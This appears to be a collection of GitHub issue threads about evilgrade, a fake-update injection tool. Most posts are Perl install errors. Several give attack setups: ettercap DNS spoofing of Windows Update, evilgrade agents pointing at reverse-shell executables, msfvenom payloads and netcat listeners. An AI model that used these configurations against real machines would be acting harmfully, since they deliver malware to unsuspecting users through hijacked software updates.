[2/9/2017:12:36:20] - [WEBSERVER] - WebServer Client on 80

evilgrade(winupdate)>
[2/9/2017:12:36:21] - [DEBUG] - [WEBSERVER] - [192.168.2.132] - Connection recieved... 

evilgrade(winupdate)>"Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*\r\n""Accept-Language: fr-FR\r\n""User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n""Accept-Encoding: gzip, deflate\r\n""Host: windowsupdate.microsoft.com\r\n""Connection: Keep-Alive\r\n""\r\n"

Ettercap Log:

dns_spoof: A [windowsupdate.microsoft.com] spoofed to [192.168.2.206]
dns_spoof: A [s2.symcb.com] spoofed to [192.168.2.206]
dns_spoof: A [s1.symcb.com] spoofed to [192.168.2.206]

Netstat check ports

# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      12239/perl          
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      12240/perl          
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      625/postgres        
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      12239/perl          
tcp6       0      0 ::1:5432                :::*                    LISTEN      625/postgres        
udp        0      0 0.0.0.0:53              0.0.0.0:*                           12240/perl  

Can't locate isrcore/Shell.pm

Hi,

i tired to use evilgrade on Kali Rolling but i got this error message:

root@kali:/home/d4rkn0/Downloads/evilgrade# ./evilgrade 
Can't locate isrcore/Shell.pm in @INC (you may need to install the isrcore::Shell module) (@INC contains: /etc/perl /usr/local/lib/i386-linux-gnu/perl/5.24.1 /usr/local/share/perl/5.24.1 /usr/lib/i386-linux-gnu/perl5/5.24 /usr/share/perl5 /usr/lib/i386-linux-gnu/perl/5.24 /usr/share/perl/5.24 /usr/local/lib/site_perl /usr/lib/i386-linux-gnu/perl-base) at ./evilgrade line 25.
BEGIN failed--compilation aborted at ./evilgrade line 25.
root@kali:/home/d4rkn0/Downloads/evilgrade#

the perl models are installed.
i tried install evilgrade from apt but got the same problem

startup error evilgrade

Hi
After upgrade kali
Start
evilgrade
Can't locate isrcore/Shell.pm in @inc (you may need to install the isrcore::Shell module) (@inc contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.24.1 /usr/local/share/perl/5.24.1 /usr/lib/x86_64-linux-gnu/perl5/5.24 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.24 /usr/share/perl/5.24 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at ./evilgrade line 25.
BEGIN failed--compilation aborted at ./evilgrade line 25.

Thank you all for the help

Error installing

i get the following error when i try to install the RPC.

root@kali:~/evilgrade# cpan> install RPC::XML

#   Failed test 'RPC::XML::Server::url method (set)'
#   at t/40_server.t line 188.
#                   'http://[::1]:41185/'
#     doesn't match '(?^:http://(127[.]0[.]0[.]1|localhost|ip6-localhost|ip6-loopback|localhost[.]localdomain):41185)'
Not an ARRAY reference at t/40_server.t line 333.
# Looks like your test exited with 255 just after 43.

then i have to ctrl+c... so it continues running.

when i try to run evilgrade i get the following error:

Can't locate RPC/XML.pm in @INC (you may need to install the RPC::XML module) (@INC contains: /root/evilgrade /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.30.0 /usr/local/share/perl/5.30.0 /usr/lib/x86_64-linux-gnu/perl5/5.30 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.30 /usr/share/perl/5.30 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at /etc/perl/isrcore/shellz.pm line 36.
Compilation failed in require at ./evilgrade line 26.
BEGIN failed--compilation aborted at ./evilgrade line 26.

Error with evilgrade at start

When i start evilgrade i have this error:
Use of uninitialized value $prompt in concatenation (.) or string at /usr/lib/x86_64-linux-gnu/perl5/5.20/Term/ReadLine/Gnu.pm line 308.
I reinstalled the package of perl but i continue to get it and i can't utilize any command

Request

Any plans to update this gem? Really cool software.

Skype upgrade module not delivering payload

Ive been playing around with the Skype module of EvilGrade v2.0.0. It doesn't seem to deliver the payload as expected. I've created a sandbox environment in which my "victim" machine is a Dell Inspiron 15 7000 Series running Windows 8.1 64-bit. I manually setup my IPv4 config on the victim PC to use two DNS servers which reside remotely on Amazon EC2 (Let's call them "Server A" and "Server B") for testing purposes. Server A simply runs dnsmasq and will resolve "ui.skype.com" queries to the "Server B" IP address. Server B is where I am running Evilgrade's skype module. I've configured the Skype module to deliver an EXE payload, which should create a reverse TCP connection to "Server C", which is listening on a specified port, and should spawn a Meterpreter session if all goes accordingly.

Now, everything works fine as far as resolving ui.skype.com to Server B, and I can see some interactions in the Evilgrade terminal, but after examining network TCP interactions between the victim PC and Server B, it doesn't appear as if the payload is being delivered.

Am I doing something incorrect here? Or perhaps the exploitability of this update-delivery method has been patched since this module was created? I am running Skype for Desktop v7.2.0.103, Windows 8.1 64-bit.

You can view the PCAP online here, which was recorded (and filtered for brevity) during the initial auto-update interaction, right here: https://www.cloudshark.org/captures/84f7ae21e341

Upon attempting the manually initiating an update via the "Help > Check for Updates..." menu item, EvilGrade terminal output was as follows: http://dumptext.com/ASDJ5xUL/raw

Thanks

CCleaner could not be updated.

hey guys I am trying to use evilgrade for a fake update on win7(32bit) machine .
My main os is parrot os security edition and I am using this along side bettercap for MiTM.

I tried using it with dap but It did not work now when I am trying to evilgrade ccleaner it gives me an error :
0x2f78: The server returned an invalid or unrecognized response

I will provide further info about my problem if necessary.

Thank you in advance!

Can't call method "accept_SSL"

After setting the dns spoof for evilgrade, when I am trying to use the teamviewer update, it gets a connection and then gives me this error "Can't call method "accept_SSL" on an undefined value at /usr/share/isr-evilgrade/isrcore/webserver.pm line 191."

how to install evilgrade

when i try run evilgrade >>>>./evilgrade
Can't locate RPC/XML.pm in @inc (you may need to install the RPC::XML module) (@inc contains: /root/evilgrade /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.22.2 /usr/local/share/perl/5.22.2 /usr/lib/x86_64-linux-gnu/perl5/5.22 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.22 /usr/share/perl/5.22 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base .) at isrcore/shellz.pm line 36.
Compilation failed in require at ./evilgrade line 26.
BEGIN failed--compilation aborted at ./evilgrade line 26.

error in initiating DNS SERVER

whenever i try to start evilgrade i always get this problem
you can see that below i have pasted that and please help me resolving this problem
evilgrade>show options

Display options:

.------------------------------------------------------------------------------------------------.
| Name | Default | Description |
+-------------+------------------------+---------------------------------------------------------+
| port | 80 | Webserver listening port |
| debug | 1 | Debug mode |
| DNSPort | 53 | Listen Name Server port |
| DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |
| faraday | 0 | Enable RPC Faraday connection |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) |
| RPCfaraday | http://127.0.0.1:9876/ | Faraday RPC Server |
| sslport | 443 | Webserver SSL listening port |
'-------------+------------------------+---------------------------------------------------------'

evilgrade>config dap
evilgrade(dap)>set agent /var/www/html/evilleaks/rev_http_main.exe
set agent, /var/www/html/evilleaks/rev_http_main.exe
evilgrade(dap)>show options

Display options:

Name = Download Accelerator
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "(update.speedbit.com)"

.----------------------------------------------------------------------------------------------------------.
| Name | Default | Description |
+-------------+-------------------------------------------------+------------------------------------------+
| endsite | update.speedbit.com/updateok.html | Website display when finish update |
| enable | 1 | Status |
| description | This critical update fix internal vulnerability | Description display in the update |
| title | Critical update | Title name display in the update |
| failsite | www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did't finish update |
| agent | /var/www/html/evilleaks/rev_http_main.exe | Agent to inject |
'-------------+-------------------------------------------------+------------------------------------------'

evilgrade(dap)>start
evilgrade(dap)>
[5/3/2020:13:36:13] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade(dap)>
[5/3/2020:13:36:13] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

evilgrade(dap)>

Error: [DNSSERVER] - Error Initiating DNS Server

can any one help me

whene i write ./evilgrade
it shows to me this message

Can't locate RPC/XML.pm in @inc (you may need to install the RPC::XML module) (@inc contains: /root/eeee/evilgrade-master /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.30.0 /usr/local/share/perl/5.30.0 /usr/lib/x86_64-linux-gnu/perl5/5.30 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.30 /usr/share/perl/5.30 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at /etc/perl/isrcore/shellz.pm line 36.
Compilation failed in require at ./evilgrade line 26.
BEGIN failed--compilation aborted at ./evilgrade line 26.

Help using notepadplus version 7

I installed evil grade using sudo apt-get install evil grade

I created the payload using msfvenom a windows shell

I setup ettercap with the right url sourceforge and redirect to my IP

I dns spoof correctly with ettercap

I run nc -l -p 4444

I open notepadplus I don't get an update message so I run update and it says gup xml error

I'm new to this I know I'm missing something

How would I setup the proxy to allow updates in notepadplus 32 bit on my windows 11 laptop is that the issue

Can someone guide me or send me a useful video that shows me what to do I know I'm close to completion and execution I just need that extra push I will be grateful

DAP is blocking msf payload injection- Download is failing

Hi Team,

Firstly thanks for this awesome tool. I was trying to inject fake update on DAP using evilgrade. First of all, whatever the agent path i set, it always takes ./agent/agent.exe.

And whenever i am injecting msfvenom payload DAp is blocking the same popping-up: DAP encountered a critical problem, need to terminate. Contact support". As a result not getting any meterpreter session.

I'd earnestly request you to please help me and enlighten in this regard so that i can use the tool.

Regards

Base class package "isrcore::Shell" is empty

Hello when i run evilgrade i get this. I am running Kali linux 2.0 mini.

Base class package "isrcore::Shell" is empty.
(Perhaps you need to 'use' the module which defines that package first,
or make that module available in @inc (@inc contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.22.2 /usr/local/share/perl/5.22.2 /usr/lib/x86_64-linux-gnu/perl5/5.22 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.22 /usr/share/perl/5.22 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base .).
at isrcore/shellz.pm line 29.
BEGIN failed--compilation aborted at isrcore/shellz.pm line 29.
Compilation failed in require at ./evilgrade line 24.
BEGIN failed--compilation aborted at ./evilgrade line 24.

:)

errors when starting evilgrade

When I start evilgrade I get these module errors. I am on latest Kali version.

[DEBUG] - Loading module: modules/itunes.pm [DEBUG] - Loading module: modules/._jetphoto.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._jetphoto.pm line 1. [DEBUG] - Loading module: modules/teamviewer.pm [DEBUG] - Loading module: modules/._freerip.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._freerip.pm line 1. [DEBUG] - Loading module: modules/._bbappworld.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._bbappworld.pm line 1. [DEBUG] - Loading module: modules/._autoit3.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._autoit3.pm line 1. [DEBUG] - Loading module: modules/safari.pm [DEBUG] - Loading module: modules/appleupdate.pm [DEBUG] - Loading module: modules/winzip.pm [DEBUG] - Loading module: modules/ubertwitter.pm [DEBUG] - Loading module: modules/._orbit.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._orbit.pm line 1. [DEBUG] - Loading module: modules/._express_talk.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._express_talk.pm line 1. [DEBUG] - Loading module: modules/miranda.pm [DEBUG] - Loading module: modules/._appstore.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._appstore.pm line 1. [DEBUG] - Loading module: modules/googleanalytics.pm [DEBUG] - Loading module: modules/opera.pm [DEBUG] - Loading module: modules/._miranda.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._miranda.pm line 1. [DEBUG] - Loading module: modules/._nokiasoftware.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._nokiasoftware.pm line 1. [DEBUG] - Loading module: modules/vmware.pm [DEBUG] - Loading module: modules/sparkle.pm [DEBUG] - Loading module: modules/amsn.pm [DEBUG] - Loading module: modules/jetphoto.pm [DEBUG] - Loading module: modules/._flip4mac.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._flip4mac.pm line 1. [DEBUG] - Loading module: modules/winamp.pm [DEBUG] - Loading module: modules/._clamwin.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._clamwin.pm line 1. [DEBUG] - Loading module: modules/._googleanalytics.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._googleanalytics.pm line 1. [DEBUG] - Loading module: modules/notepadplus.pm [DEBUG] - Loading module: modules/apptapp.pm [DEBUG] - Loading module: modules/quicktime.pm [DEBUG] - Loading module: modules/._bsplayer.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._bsplayer.pm line 1. [DEBUG] - Loading module: modules/autoit3.pm [DEBUG] - Loading module: modules/._vidbox.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._vidbox.pm line 1. [DEBUG] - Loading module: modules/._openoffice.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._openoffice.pm line 1. [DEBUG] - Loading module: modules/filezilla.pm [DEBUG] - Loading module: modules/istat.pm [DEBUG] - Loading module: modules/._apt.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._apt.pm line 1. [DEBUG] - Loading module: modules/._teamviewer.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._teamviewer.pm line 1. [DEBUG] - Loading module: modules/orbit.pm [DEBUG] - Loading module: modules/._quicktime.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._quicktime.pm line 1. [DEBUG] - Loading module: modules/yahoomsn.pm [DEBUG] - Loading module: modules/._speedbit.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._speedbit.pm line 1. [DEBUG] - Loading module: modules/._divxsuite.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._divxsuite.pm line 1. [DEBUG] - Loading module: modules/._blackberry.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._blackberry.pm line 1. [DEBUG] - Loading module: modules/port.pm [DEBUG] - Loading module: modules/._amsn.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._amsn.pm line 1. [DEBUG] - Loading module: modules/._trillian.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._trillian.pm line 1. [DEBUG] - Loading module: modules/winupdate.pm [DEBUG] - Loading module: modules/._photoscape.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._photoscape.pm line 1. [DEBUG] - Loading module: modules/._getjar.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._getjar.pm line 1. [DEBUG] - Loading module: modules/allmynotes.pm [DEBUG] - Loading module: modules/vidbox.pm [DEBUG] - Loading module: modules/._apptapp.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._apptapp.pm line 1. [DEBUG] - Loading module: modules/blackberry.pm [DEBUG] - Loading module: modules/._winscp.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._winscp.pm line 1. [DEBUG] - Loading module: modules/dap.pm [DEBUG] - Loading module: modules/osx.pm [DEBUG] - Loading module: modules/._techtracker.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._techtracker.pm line 1. [DEBUG] - Loading module: modules/isopen.pm [DEBUG] - Loading module: modules/appstore.pm [DEBUG] - Loading module: modules/._jet.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._jet.pm line 1. [DEBUG] - Loading module: modules/._opera.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._opera.pm line 1. [DEBUG] - Loading module: modules/._nokia.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._nokia.pm line 1. [DEBUG] - Loading module: modules/fcleaner.pm [DEBUG] - Loading module: modules/photoscape.pm [DEBUG] - Loading module: modules/._growl.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._growl.pm line 1. [DEBUG] - Loading module: modules/._mirc.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._mirc.pm line 1. [DEBUG] - Loading module: modules/._vmware.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._vmware.pm line 1. [DEBUG] - Loading module: modules/freerip.pm [DEBUG] - Loading module: modules/._jdtoolkit.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._jdtoolkit.pm line 1. [DEBUG] - Loading module: modules/._gom.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._gom.pm line 1. [DEBUG] - Loading module: modules/jdtoolkit.pm [DEBUG] - Loading module: modules/flip4mac.pm [DEBUG] - Loading module: modules/._yahoomsn.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._yahoomsn.pm line 1. [DEBUG] - Loading module: modules/._dap.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._dap.pm line 1. [DEBUG] - Loading module: modules/._panda_antirootkit.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._panda_antirootkit.pm line 1. [DEBUG] - Loading module: modules/divxsuite.pm [DEBUG] - Loading module: modules/._virtualbox.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._virtualbox.pm line 1. [DEBUG] - Loading module: modules/._safari.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._safari.pm line 1. [DEBUG] - Loading module: modules/._sunjava.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._sunjava.pm line 1. [DEBUG] - Loading module: modules/winscp.pm [DEBUG] - Loading module: modules/._sunbelt.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._sunbelt.pm line 1. [DEBUG] - Loading module: modules/panda_antirootkit.pm [DEBUG] - Loading module: modules/._winzip.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._winzip.pm line 1. [DEBUG] - Loading module: modules/skype.pm [DEBUG] - Loading module: modules/growl.pm [DEBUG] - Loading module: modules/nokiasoftware.pm [DEBUG] - Loading module: modules/techtracker.pm [DEBUG] - Loading module: modules/._fcleaner.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._fcleaner.pm line 1. [DEBUG] - Loading module: modules/clamwin.pm [DEBUG] - Loading module: modules/flashget.pm [DEBUG] - Loading module: modules/._ccleaner.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._ccleaner.pm line 1. [DEBUG] - Loading module: modules/._port.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._port.pm line 1. [DEBUG] - Loading module: modules/ccleaner.pm [DEBUG] - Loading module: modules/._ubertwitter.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._ubertwitter.pm line 1. [DEBUG] - Loading module: modules/speedbit.pm [DEBUG] - Loading module: modules/._flashget.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._flashget.pm line 1. [DEBUG] - Loading module: modules/._atube.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._atube.pm line 1. [DEBUG] - Loading module: modules/paintnet.pm [DEBUG] - Loading module: modules/._allmynotes.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._allmynotes.pm line 1. [DEBUG] - Loading module: modules/._istat.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._istat.pm line 1. [DEBUG] - Loading module: modules/nokia.pm [DEBUG] - Loading module: modules/trillian.pm [DEBUG] - Loading module: modules/apt.pm [DEBUG] - Loading module: modules/sunjava.pm [DEBUG] - Loading module: modules/linkedin.pm [DEBUG] - Loading module: modules/cpan.pm [DEBUG] - Loading module: modules/._osx.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._osx.pm line 1. [DEBUG] - Loading module: modules/._notepadplus.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._notepadplus.pm line 1. [DEBUG] - Loading module: modules/mirc.pm [DEBUG] - Loading module: modules/cygwin.pm [DEBUG] - Loading module: modules/sunbelt.pm [DEBUG] - Loading module: modules/openoffice.pm [DEBUG] - Loading module: modules/._linkedin.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._linkedin.pm line 1. [DEBUG] - Loading module: modules/jet.pm [DEBUG] - Loading module: modules/._appleupdate.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._appleupdate.pm line 1. [DEBUG] - Loading module: modules/._paintnet.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._paintnet.pm line 1. [DEBUG] - Loading module: modules/._cygwin.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._cygwin.pm line 1. [DEBUG] - Loading module: modules/._sparkle.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._sparkle.pm line 1. [DEBUG] - Loading module: modules/._filezilla.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._filezilla.pm line 1. [DEBUG] - Loading module: modules/atube.pm [DEBUG] - Loading module: modules/._itunes.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._itunes.pm line 1. [DEBUG] - Loading module: modules/getjar.pm [DEBUG] - Loading module: modules/._cpan.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._cpan.pm line 1. [DEBUG] - Loading module: modules/._skype.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._skype.pm line 1. [DEBUG] - Loading module: modules/._isopen.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._isopen.pm line 1. [DEBUG] - Loading module: modules/._superantispyware.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._superantispyware.pm line 1. [DEBUG] - Loading module: modules/gom.pm [DEBUG] - Loading module: modules/._winupdate.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._winupdate.pm line 1. [DEBUG] - Loading module: modules/express_talk.pm [DEBUG] - Loading module: modules/bsplayer.pm [DEBUG] - Loading module: modules/superantispyware.pm [DEBUG] - Loading module: modules/bbappworld.pm [DEBUG] - Loading module: modules/virtualbox.pm [DEBUG] - Loading module: modules/._winamp.pm Error: Loading module ($base):Unrecognized character \x05; marked by <-- HERE after <-- HERE near column 2 at /opt/evilgrade/modules/._winamp.pm line 1.

Notepad++ problem

failed to connect to notepad-plus-plus.org port 443: Timed out - im using ettercap, and nc, can someone help me with it please?

DAP Not working

I run the DAP module and it does not show an update on my target machine. The virtual host is set at "update.speedbit.com, but after examining the MITMF results when I am DNS spoofing, I notice that it is looking for a "stub.speedbit.com". Does the virtual host need to be changed to "stub.speedbit.com? If so, how do I do that? Thank you

Can't locate isrcore/Shell.pm in @INC

Hello guys! Im trying to run evilgrade but i always get an error, i tried changing os'es, using git clone or aptitude but nothing works. This is the error:
"Can't locate isrcore/Shell.pm in @inc (you may need to install the isrcore::Shell module) (@inc contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.24.1 /usr/local/share/perl/5.24.1 /usr/lib/x86_64-linux-gnu/perl5/5.24 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.24 /usr/share/perl/5.24 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at ./evilgrade line 25.
BEGIN failed--compilation aborted at ./evilgrade line 25."

error when i try to run

when i try run evilgrade >>>>./evilgrade
Can't locate isrcore/Shell.pm in @inc (you may need to install the isrcore::Shell module) (@inc contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.26.1 /usr/local/share/perl/5.26.1 /usr/lib/x86_64-linux-gnu/perl5/5.26 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.26 /usr/share/perl/5.26 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at ./evilgrade line 25.
BEGIN failed--compilation aborted at ./evilgrade line 25.
i have already install all module by cpan. i try to install the required module isrcore::shell but there is new error:
install isrcore::Shell
Caught SIGINT, trying to continue
Warning: Cannot install isrcore::Shell, don't know what it is.
Try the command

i /isrcore::Shell/

to find objects with matching identifiers.

someone can help me?

add ssl function

thes tools only can use 80 port, would u mind to tell me , how to listen 443 port and use ssl function?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.